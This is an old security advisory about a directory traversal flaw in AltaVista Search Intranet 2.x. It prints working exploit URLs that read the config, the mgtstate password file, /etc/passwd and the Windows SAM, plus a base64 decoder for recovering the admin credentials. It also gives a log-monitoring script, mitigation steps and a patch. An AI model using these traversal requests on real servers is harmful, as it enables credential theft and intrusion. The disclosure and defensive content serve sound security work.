COMMAND

    altavista search

SYSTEMS AFFECTED

    altavista search intranet 2.??

PROBLEM

    Edward Glowacki posted what Rudi  Carell found.  Edward was   able
    to verify the vulnerability in 2.0b and 2.3a (with the patch)   on
    Digital Unix.   At the  end of  this advisory  is a  simple   perl
    script  Edward  wrote  to  watch  the  log  file and send a  short
    email  when  someone  grabs  the  mgtstate  file.   It can't  stop
    intruders from getting your password,  but at least you can   have
    some idea that your password has escaped.

    The  template-variable:   {mss}  in   the  main   search  function
    (cgi-bin/query?) allows you one traversal step back and shows  you
    any file  in the  "http -  directory".   As for  example, the real
    thing is:

        http://we.loverudi.org:9000/cgi-bin/query?mss=../config

    If you try to go more then one directory back the program  escapes
    {mss} with "@../" ...   Nice try .. but  much to late ..  the http
    directory contains some very interesting files:

        ../config               ( Var "MGMT_PW=[ Plaintext MGMT-password ]" )
        ../logs/mgtstate        ( passw=[ encoded mgt-password ]  .. NOT the MGMT-password !!!)
        ../logs/stats.log       ( sometimes stats_log )
        ../logs/access.log      ( sometimes access_log )

    Forget  everything  but  the  "mgtstate"  file.   It  contains the
    username:password for the online-config tool  (X:9000/cgi-bin/mgt)
    in the form:

        passw=[ encoded user:password string ]

    These guys are really smart; they encode their passwords (base64).
    Now we need a prg/script to decode the user/password - string:

        #!/usr/bin/perl
        use MIME::Base64;
        print decode_base64("$ARGV[0]"), "\n";

    Edward's perl script:

    #!/bin/perl
    #
    # Simple perl script to watch your logfile and notify you if someone tries to
    # get at mgtstate to grab your AltaVista admin password.  Not elegant, but it
    # should work.  It will check the whole log file from the beginning and
    # continue to monitor until interrupted (probably just want to put it in
    # the background and let it go).  Tested on Digital Unix 4.0D. Use at your
    # own risk.
    #
    # useage:  watch logfile email <identifier>
    #   optional identifier to distinguish different servers if needed

    $logfile = "";
    $email = "";
    $identifier = "";

    $logfile = $ARGV[0];
    shift;
    $email = $ARGV[0];
    shift;
    $identifier = $ARGV[0];
    shift;

    if($logfile eq "" || $email eq "") {
        print("Need a logfile and email address, i.e.:\n");
        print("  watch httpd/logs/access_log someone\@somewhere.com\n");
        exit(0);
    }

    open(ACCESS,"/bin/tail -f -c +0 $logfile |") || die "Can't open tail of log file";

    while(<ACCESS>) {
        if(/mgtstate/) {
            open(MAIL,"|/bin/mailx -s \"AltaVista intruder: mgtstate access\" $email");
            if($identifier ne "") {
                print(MAIL "Ident: $identifier\n\n");
            }
            print(MAIL "$_");
            close(MAIL);
        }
    }

    Here  are  some  more  bugs  in  the  AV-Search  thing...    Using
    uri-encoded  strings  it  is  possible  to  view "any" file on the
    system.  Examples (unices)

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd

    or on an MS IIS ...

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._

    Interesting infos about the file structure ...

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log

    or another file which does contain the password...

        http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf

SOLUTION

    AltaVista  issued  patch  out.   To  disable  this  security  hole
    temporarily, until  you apply  a patch  follow the  steps detailed
    below.  Full steps would be:

    - edit <install-dir>/httpd/config file and change MGMT_IPSPEC from
      "0.0.0.0/0" to a specific IP such as "127.0.0.1/32"
    - stop page gathering via management interface
    - restart altavista search service (to re-read config file)
    - restart page gathering if necessary
    - change the username/password through the management interface to
      bogus information
    - exploit  server  and  download  ../logs/mgtstate  (puts file  in
      cache) http://localhost:9000/cgi-bin/query?mss=../logs/mgtstate
    - change the username/password through the management interface to
      something different (but not used anywhere else)
    - avoid restarting the AltaVista service or clearing the cache

    Now when  a user  grabs the  file, they  will get  the old  cached
    information which is now invalid.   This will last for as long  as
    the mgtstate file stays in  the mhttpd's cache (until the  service
    is restarted again).

    The patch is available on AltaVista's Web site at:

        http://doc.altavista.com/business_solutions/search_products/free_downloads/search_intranet.shtml

    The patch  is labeled  "AltaVista Search  Intranet V2.3A  Security
    Patch 12/99".